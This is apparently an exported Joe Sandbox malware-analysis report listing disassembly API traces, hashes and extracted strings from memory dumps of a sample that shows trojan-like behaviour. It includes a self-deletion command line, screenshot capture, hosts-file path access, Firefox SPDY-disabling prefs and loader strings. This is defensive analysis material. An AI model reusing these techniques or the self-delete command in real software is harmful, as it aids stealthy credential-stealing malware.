• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: Library$AddressFreeLoadProc
• String ID: DnsFlushResolverCache$dnsapi
• API String ID: 145871493-2696141711
• Opcode ID: 36b9477244243fc65d3aed68ef795c1633e24aa1a68dec2a880403fe4b67ade2
• Instruction ID: de47a484c9a4c01348ab34ff2fa1ca69ed6d1f64397dde5c026b61f6f0ba081a
• Opcode Fuzzy Hash: 36b9477244243fc65d3aed68ef795c1633e24aa1a68dec2a880403fe4b67ade2
• Instruction Fuzzy Hash: 27E04822241A22D6D62117665D896AF1659DEC17613424636E819F32C09B3D884298AD
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,004079E1,8EB39475,?), ref: 00407421
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00407428
                                                                                                                                                                                                                                                                                            • IsWow64Process.KERNEL32(00000000,00000000,?,?,004079E1,8EB39475,?), ref: 0040744C
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AddressHandleModuleProcProcessWow64
                                                                                                                                                                                                                                                                                            • String ID: IsWow64Process$kernel32
                                                                                                                                                                                                                                                                                            • API String ID: 1818662866-3789238822
                                                                                                                                                                                                                                                                                            • Opcode ID: 79b819af46dbac8717e3d531836bc8e78bcd7ba50d740ae358c9fc3078a08f27
                                                                                                                                                                                                                                                                                            • Instruction ID: e90818c18119c4b815425817d2e774f9f44224c08fcb8d73207bfa4cc81b1f04
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 79b819af46dbac8717e3d531836bc8e78bcd7ba50d740ae358c9fc3078a08f27
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0AE09275401302EFDB00A7F0DC0EB9E3668AB40759F20463AB402F20C0DBBCEA00C66D
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(schannel.dll,00403AE1,00000000,00000000,?,?,?,00408E96,?,00407F38,00000000,00000000), ref: 00403168
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,InitSecurityInterfaceA), ref: 00403180
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00408E96,?,00407F38,00000000,00000000), ref: 004031A0
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                                            • String ID: InitSecurityInterfaceA$schannel.dll
                                                                                                                                                                                                                                                                                            • API String ID: 145871493-268872944
                                                                                                                                                                                                                                                                                            • Opcode ID: d1a1427068a8ae5bee01f45136ef7aa65b318e81bffd8f28bc1104f3795ff721
                                                                                                                                                                                                                                                                                            • Instruction ID: 131af09ec97f5aab2ee22765e42e2a7ba2b6d34ce762315e39935cec4ccd5fa5
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d1a1427068a8ae5bee01f45136ef7aa65b318e81bffd8f28bc1104f3795ff721
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 04F06D30652281CEE7115FB0EE4C7963BADA70430BF108136A005F92E2DBBC9199DA1E
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404B40: VirtualAlloc.KERNEL32(00000000,00000109,00003000,00000004,?,?,0040411D,?), ref: 00404B51
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
                                                                                                                                                                                                                                                                                            • sprintf.MSVCRT ref: 0040A9E8
                                                                                                                                                                                                                                                                                            • sprintf.MSVCRT ref: 0040AA00
                                                                                                                                                                                                                                                                                            • _endthreadex.MSVCRT(00000000), ref: 0040AA63
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AllocVirtualsprintf$_endthreadex
                                                                                                                                                                                                                                                                                            • String ID: %s %s
                                                                                                                                                                                                                                                                                            • API String ID: 2621873700-2939940506
                                                                                                                                                                                                                                                                                            • Opcode ID: 7a3023b5390878df82cb68fce8d5178a49c938cdd1e1d6fa6e766aa37eeba27b
                                                                                                                                                                                                                                                                                            • Instruction ID: 25ce27bdb26a5dd991821e42614bac8864a3014263b9c74c023817e95a20eb2c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7a3023b5390878df82cb68fce8d5178a49c938cdd1e1d6fa6e766aa37eeba27b
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E821F571504208FFEF11AF64DD46B9D3BA4EF44308F11447AF9047A2C2DBBD5A90DAAA
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404B40: VirtualAlloc.KERNEL32(00000000,00000109,00003000,00000004,?,?,0040411D,?), ref: 00404B51
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
                                                                                                                                                                                                                                                                                            • sprintf.MSVCRT ref: 0040A90F
                                                                                                                                                                                                                                                                                            • sprintf.MSVCRT ref: 0040A923
                                                                                                                                                                                                                                                                                            • _endthreadex.MSVCRT(00000000), ref: 0040A980
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AllocVirtualsprintf$_endthreadex
                                                                                                                                                                                                                                                                                            • String ID: %s %s
                                                                                                                                                                                                                                                                                            • API String ID: 2621873700-2939940506
                                                                                                                                                                                                                                                                                            • Opcode ID: b0da3b10f1ed82e0112ae8878d8ba1af9585117033ca3846c36750e99de01216
                                                                                                                                                                                                                                                                                            • Instruction ID: c01f936ddc6928722aafe6f7d1980acef65d0fbf2d9a2e5eb23046a41ed7f736
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b0da3b10f1ed82e0112ae8878d8ba1af9585117033ca3846c36750e99de01216
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FA212270504208FFDB11AF60D806B9E7BA4EF40358F10443EF844762D2D7BE9A919A59
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00407038: GetModuleHandleA.KERNEL32(xul.dll), ref: 0040703E
                                                                                                                                                                                                                                                                                            • ExitThread.KERNEL32 ref: 004071B5
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • network.http.spdy.enabled, xrefs: 00407157
                                                                                                                                                                                                                                                                                            • network.http.spdy.enabled.v3-1, xrefs: 00407147
                                                                                                                                                                                                                                                                                            • network.http.spdy.enabled.http2, xrefs: 00407166
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: ExitHandleModuleThread
• String ID: network.http.spdy.enabled$network.http.spdy.enabled.http2$network.http.spdy.enabled.v3-1
• API String ID: 2306408829-2830041269
• Opcode ID: ac7c64d2914a837005a64ef2e77bbae8bfcb6d0616092af3c5bb99052eb6a454
• Instruction ID: b645bb33f3690f7efb38002f37e333da0407941bb56710324032b4bd20fe1697
• Opcode Fuzzy Hash: ac7c64d2914a837005a64ef2e77bbae8bfcb6d0616092af3c5bb99052eb6a454
• Instruction Fuzzy Hash: 60F0C236A4434166FA3033B19D9BB6726458FC1B94F10853FB901FB2D1DEBC8C8491AE
APIs
Strings
• ping 127.0.0.1 -n 3&del "%s", xrefs: 0040AAC9
Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: memset$wsprintf
• String ID: ping 127.0.0.1 -n 3&del "%s"
• API String ID: 1651128882-2576017089
• Opcode ID: 0ea85a1cfb1554be7e531fc598d6faa94bb77c13fd26d5c0f05194fb60129c20
• Instruction ID: e0f610ce0ca63109886393cd8f86ac73501c537212b8f915c5781b4adf24ece3
• Opcode Fuzzy Hash: 0ea85a1cfb1554be7e531fc598d6faa94bb77c13fd26d5c0f05194fb60129c20
• Instruction Fuzzy Hash: 31F012B5C1022C69CB60E7B58C4DFCB73ACAF04344F0005B67618F2092EA749BD48BA9
APIs
• InterlockedCompareExchange.KERNEL32(0041A908,00000001,00000000), ref: 0040164B
• Sleep.KERNEL32(00000001), ref: 00401664
• InterlockedCompareExchange.KERNEL32(0041A908,00000001,00000000), ref: 0040166E
Strings
Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: CompareExchangeInterlocked$Sleep
• String ID:
• API String ID: 1766322245-3916222277
• Opcode ID: 1b17fa83b11a3fb0155d9d4c4589fb0e8afcf26a233eb6726440a5e3e8d473eb
• Instruction ID: 3146644f708acef42d48bdf34e0c10a7afb47483ee5a9ffb90359bdae2770461
• Opcode Fuzzy Hash: 1b17fa83b11a3fb0155d9d4c4589fb0e8afcf26a233eb6726440a5e3e8d473eb
• Instruction Fuzzy Hash: 57F02B32781308F7EB1053918E82FEB326C9742B59F144037F601B60C0C3FAA981857D
APIs
• IsBadReadPtr.KERNEL32(?,00000014), ref: 00405EB8
• realloc.MSVCRT ref: 00405F00
• IsBadReadPtr.KERNEL32(-000000DC,00000014), ref: 00405F91
Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: Read$realloc
• String ID:
• API String ID: 1241503663-0
• Opcode ID: 56f4925823c77dbdb00473b869507d096924a3e80ead695488937fdde5cdbafd
• Instruction ID: c2917731f4da528e9a0bf099748f17bf4ccf5599c3ba980bf665be7c3becfa2b
• Opcode Fuzzy Hash: 56f4925823c77dbdb00473b869507d096924a3e80ead695488937fdde5cdbafd
• Instruction Fuzzy Hash: F4417971A04606EFEB208FA5C844B6BB7F5EF04310F24457AE556A72D0D738E941DF58
APIs
• VirtualProtect.KERNEL32(?,?,00000040,?), ref: 00401515
• VirtualProtect.KERNEL32(00000000,?,?,?,?,?,00000040,?), ref: 00401561
• GetCurrentProcess.KERNEL32(00000000,?,?,?,00000040,?), ref: 0040156B
• FlushInstructionCache.KERNEL32(00000000,?,?,00000040,?), ref: 00401572
Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: ProtectVirtual$CacheCurrentFlushInstructionProcess
• String ID:
• API String ID: 4115577372-0
• Opcode ID: 33fba6efa9aa37a32695c853373d2d2382bf6eca6c8649853a7649370b02e70f
• Instruction ID: 98677d2faea99ee57e6bc5d1e6dd12a9e2edf7674fd3a44d719a18d412bfc6ed
• Opcode Fuzzy Hash: 33fba6efa9aa37a32695c853373d2d2382bf6eca6c8649853a7649370b02e70f
• Instruction Fuzzy Hash: 0F21A172600204FFCB01CFA8DD85B9E7FB8AF49314F1442A6E902EA2E4D378D644C755
APIs
• InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 0040ADD7
  • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
• InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 0040ADEF
  • Part of subcall function 00404C17: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,004079DA,8EB39475,?,?,?), ref: 00404C34
  • Part of subcall function 00404B40: VirtualAlloc.KERNEL32(00000000,00000109,00003000,00000004,?,?,0040411D,?), ref: 00404B51
• CreateThread.KERNEL32(00000000,00000000,Function_0000A13C,00000000,00000000,00000000), ref: 0040AE3A
• WaitForSingleObject.KERNEL32(00000000,00000064), ref: 0040AE43
Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: AllocVirtual$InternetOptionQuery$CreateObjectSingleThreadWait
• String ID:
• API String ID: 2109580575-0
• Opcode ID: ddf6a12d34df4d65e3d98ad85dc65d36ba597e1d57071206ca6313221c280cf7
• Instruction ID: 85f8da8ab98e3e359bb9ffee973ef0ed3ed5780d50117302d11dec6e27627b2d
• Opcode Fuzzy Hash: ddf6a12d34df4d65e3d98ad85dc65d36ba597e1d57071206ca6313221c280cf7
• Instruction Fuzzy Hash: 6B211DB1900209FFDF11AFA1DD49D9E7F69EB44358F00402ABA04A6191D7759D60DBA4
APIs
• InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 0040AD20
  • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
• InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 0040AD38
  • Part of subcall function 00404C17: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,004079DA,8EB39475,?,?,?), ref: 00404C34
  • Part of subcall function 00404B40: VirtualAlloc.KERNEL32(00000000,00000109,00003000,00000004,?,?,0040411D,?), ref: 00404B51
• CreateThread.KERNEL32(00000000,00000000,Function_0000A13C,00000000,00000000,00000000), ref: 0040AD83
• WaitForSingleObject.KERNEL32(00000000,00000064), ref: 0040AD8C
Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
                                                                                                                                                                                                                                                                                            • API ID: AllocVirtual$InternetOptionQuery$CreateObjectSingleThreadWait
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2109580575-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 81e12cd764da1528d32e4904fdccbe766ef669b6baaa3c7432b9a665d274c7da
                                                                                                                                                                                                                                                                                            • Instruction ID: 4327dd8a261df6e6574da9dc39f369b90856255ce890c35f50618d1bcf3a43d3
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 81e12cd764da1528d32e4904fdccbe766ef669b6baaa3c7432b9a665d274c7da
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FA112CB1900209FFEB11AFA1DD49D9EBF69EB44358F00802ABA04A7191D7759E60DB64
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • OpenThread.KERNEL32(0000005A,00000000,00000000,?,?,0040162B), ref: 004014A7
                                                                                                                                                                                                                                                                                            • ResumeThread.KERNEL32(00000000,?,?,0040162B), ref: 004014B4
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,0040162B), ref: 004014BB
                                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000,?,?,0040162B), ref: 004014D2
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Thread$CloseFreeHandleHeapOpenResume
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 993137029-0
                                                                                                                                                                                                                                                                                            • Opcode ID: ba3a4b9eab9395966fea36ccecf66b824b248734ff01ec692414fe074bab3333
                                                                                                                                                                                                                                                                                            • Instruction ID: 79214c585a8421c61a794e324dc1ff4e28f576e7ea37099e67f93a857c770830
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ba3a4b9eab9395966fea36ccecf66b824b248734ff01ec692414fe074bab3333
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 57F03031200702EFDB215F95EDC4B1677E9FB44741F20863AF586611B0C7356481DF29
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
                                                                                                                                                                                                                                                                                            • _endthreadex.MSVCRT(00000000), ref: 00405A5A
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AllocVirtual_endthreadex
                                                                                                                                                                                                                                                                                            • String ID: Software\Z0BAZwxx\Addr\$remove
                                                                                                                                                                                                                                                                                            • API String ID: 1882685189-3233916144
                                                                                                                                                                                                                                                                                            • Opcode ID: d19259da940ea4070624123dbb572b27c287cd82d936770fdcd69e1385ab5584
                                                                                                                                                                                                                                                                                            • Instruction ID: e348d27a53ac47a28f771e4e7b5bcb066840831ebc80282ed624f7be9f97a654
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d19259da940ea4070624123dbb572b27c287cd82d936770fdcd69e1385ab5584
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9110A31508204ABDB117B65D946B9F7FA8DF91354F10403FF844771D2DBBC59418A6D
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: memsetwsprintf
                                                                                                                                                                                                                                                                                            • String ID: d&%ls&%ls&%ls&%S&%ls
                                                                                                                                                                                                                                                                                            • API String ID: 2856067436-941614314
                                                                                                                                                                                                                                                                                            • Opcode ID: f44854d22df9448e6428b447e49cfb0dada4c7b2c9f8bed5b18710ace043fa38
                                                                                                                                                                                                                                                                                            • Instruction ID: 5969caadbbd574221523bcd0f1be0b9f2921e298d21b0f94d9c5ce1c22e7f39c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f44854d22df9448e6428b447e49cfb0dada4c7b2c9f8bed5b18710ace043fa38
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BB112C70100204ABEB106F28EE4AEAF3794AB81704F00403BF915AA1D2D6B9E4A1472D
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
                                                                                                                                                                                                                                                                                              • Part of subcall function 00402E20: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,0040774A,00000025,drivers\etc,protocol,00000000,?,?,00407E9B), ref: 00402E3B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00402E20: PathAppendW.SHLWAPI(00000000,00408038,?,?,0040774A,00000025,drivers\etc,protocol,00000000,?,?,00407E9B,00408038,?,004054CD), ref: 00402E5C
                                                                                                                                                                                                                                                                                              • Part of subcall function 00402E20: CreateDirectoryW.KERNEL32(00000000,00000000,?,0040774A,00000025,drivers\etc,protocol,00000000,?,?,00407E9B,00408038,?,004054CD), ref: 00402E65
                                                                                                                                                                                                                                                                                              • Part of subcall function 00402E20: SetFileAttributesW.KERNEL32(00000000,00000006,?,0040774A,00000025,drivers\etc,protocol,00000000,?,?,00407E9B,00408038,?,004054CD), ref: 00402E72
                                                                                                                                                                                                                                                                                              • Part of subcall function 00402E20: PathAppendW.SHLWAPI(00000000,00407E9B,?,?,0040774A,00000025,drivers\etc,protocol,00000000,?,?,00407E9B,00408038,?,004054CD), ref: 00402E7C
                                                                                                                                                                                                                                                                                            • _endthreadex.MSVCRT(00000000), ref: 0040913C
                                                                                                                                                                                                                                                                                              • Part of subcall function 00409018: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0040903B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00409018: GetSystemMetrics.USER32(00000000), ref: 00409048
                                                                                                                                                                                                                                                                                              • Part of subcall function 00409018: GetSystemMetrics.USER32(00000001), ref: 0040904F
                                                                                                                                                                                                                                                                                              • Part of subcall function 00409018: CreateCompatibleDC.GDI32(00000000), ref: 00409055
                                                                                                                                                                                                                                                                                              • Part of subcall function 00409018: GetDC.USER32(00000000), ref: 0040906B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00409018: CreateCompatibleBitmap.GDI32(00000000), ref: 0040906E
                                                                                                                                                                                                                                                                                              • Part of subcall function 00409018: SelectObject.GDI32(?,00000000), ref: 0040907B
                                                                                                                                                                                                                                                                                              • Part of subcall function 00409018: GetDC.USER32(00000000), ref: 00409089
                                                                                                                                                                                                                                                                                              • Part of subcall function 00409018: BitBlt.GDI32(?,00000000,00000000,?,?,00000000), ref: 00409097
                                                                                                                                                                                                                                                                                              • Part of subcall function 00409018: DeleteObject.GDI32(?), ref: 004090AD
                                                                                                                                                                                                                                                                                              • Part of subcall function 00409018: GdiplusShutdown.GDIPLUS(?), ref: 004090B6
                                                                                                                                                                                                                                                                                              • Part of subcall function 00408B72: sprintf.MSVCRT ref: 00408C44
                                                                                                                                                                                                                                                                                              • Part of subcall function 00408B72: wsprintfA.USER32 ref: 00408C80
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: CreatePath$AppendCompatibleGdiplusMetricsObjectSystem$AllocAttributesBitmapDeleteDirectoryFileFolderSelectShutdownStartupVirtual_endthreadexsprintfwsprintf
• String ID: Z0BAZwxx$\screenshot.jpg
• API String ID: 1151080723-1615771018
• Opcode ID: 0df8939dc79758e248a3249ddbe0df6caf7780c9d7edccc916dfe6d68158da24
• Instruction ID: cd78c62ea983c312288fd31c21fd840951ac9d491fd5078f52529bde2f4c188f
• Opcode Fuzzy Hash: 0df8939dc79758e248a3249ddbe0df6caf7780c9d7edccc916dfe6d68158da24
• Instruction Fuzzy Hash: C7F04B6268522539F5253272AD0BEAB2A5CCF92764F21003FF904B61C3EEBD594200AE
APIs
• ExitThread.KERNEL32 ref: 00406EA9
  • Part of subcall function 00404C49: VirtualAlloc.KERNELBASE(00000000,00003000,00003000,00000004,?,00407953,?), ref: 00404C66
  • Part of subcall function 00409BA4: GetModuleHandleW.KERNEL32(ntdll.dll), ref: 00409BB2
  • Part of subcall function 00409BA4: GetProcAddress.KERNEL32(00000000,sprintf), ref: 00409BC8
Strings
Memory Dump Source
• Source File: 00000012.00000002.4013690596.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_400000_jvauyc32.jbxd
Similarity
• API ID: AddressAllocExitHandleModuleProcThreadVirtual
• String ID: %s:ZKTDJRBHOEUDX$AMMYY
• API String ID: 3375109803-2616122583
• Opcode ID: 5f07cd6feea3f80a6d5910947b139aab12928ac3e85777d95f7bd3bc1d253d15
• Instruction ID: a767efb5eee708c685ae28445d948c501301659c9242652d4ff3cec2c730faad
• Opcode Fuzzy Hash: 5f07cd6feea3f80a6d5910947b139aab12928ac3e85777d95f7bd3bc1d253d15
• Instruction Fuzzy Hash: 21F0E965141720BAE1202375ED87F5B1959CF46764F22003BF905F61C1EEBCB94540BD
Strings
Memory Dump Source
• Source File: 00000029.00000002.4023037296.00000000007B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_7b0000_sedSmibSjDOiaD.jbxd
Similarity
• API ID:
• String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$X@$hh8geqpHJTkdns6$open$purity_control_7728
• API String ID: 0-623675093
• Opcode ID: 0b236e4183e66166baeedc4bb63a439747f50f47959c2c25ea662ca91e6778b3
• Instruction ID: b77d264d76fd5a7f4237962b160cabbdb937f4a9b64e71e9dd979c0c89808226
• Opcode Fuzzy Hash: 0b236e4183e66166baeedc4bb63a439747f50f47959c2c25ea662ca91e6778b3
• Instruction Fuzzy Hash: 19613C71640289EFEF10DFA0CC49FEA3768EB44701F544515EE09BE1E0D6B5AA448BAA
Memory Dump Source
• Source File: 00000029.00000002.4023037296.00000000007B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_7b0000_sedSmibSjDOiaD.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
• Instruction ID: 132fd60298b3d453a7d1ffdc99194ad216610874b440f940b356353ab4803d87
• Opcode Fuzzy Hash: 0ba0d898a5c73863433b1fcc0522d2c8af6e234d9cbef30de323d9749de855c6
• Instruction Fuzzy Hash: C4B13875A002898FEF10CF24CC44BEA77A5FF44304F484925DD09AF2A1D779AA94CF8A
Strings
Memory Dump Source
• Source File: 00000029.00000002.4023037296.00000000007B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_41_2_7b0000_sedSmibSjDOiaD.jbxd
Similarity
• API ID:
• String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$X@$open
• API String ID: 0-1075979870
• Opcode ID: 4be88916d7375141c92d462fa2e6be302d55da5f01b1b4ee245b71dc4840805a
• Instruction ID: d7329239cd406a9790a1c3e2fb17a10ccfcb032649b858e16919ede0bd9ab710
• Opcode Fuzzy Hash: 4be88916d7375141c92d462fa2e6be302d55da5f01b1b4ee245b71dc4840805a
• Instruction Fuzzy Hash: 7D11DB71244289ABEF10DEA08D4DFEE37A8AB84B05F444415BA09FE0E0DAB59644876B
Strings
Memory Dump Source
• Source File: 0000002A.00000002.4035021990.00000000012B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_12b0000_sedSmibSjDOiaD.jbxd
Similarity
• API ID:
• String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$X@$hh8geqpHJTkdns6$open$purity_control_7728
• API String ID: 0-623675093
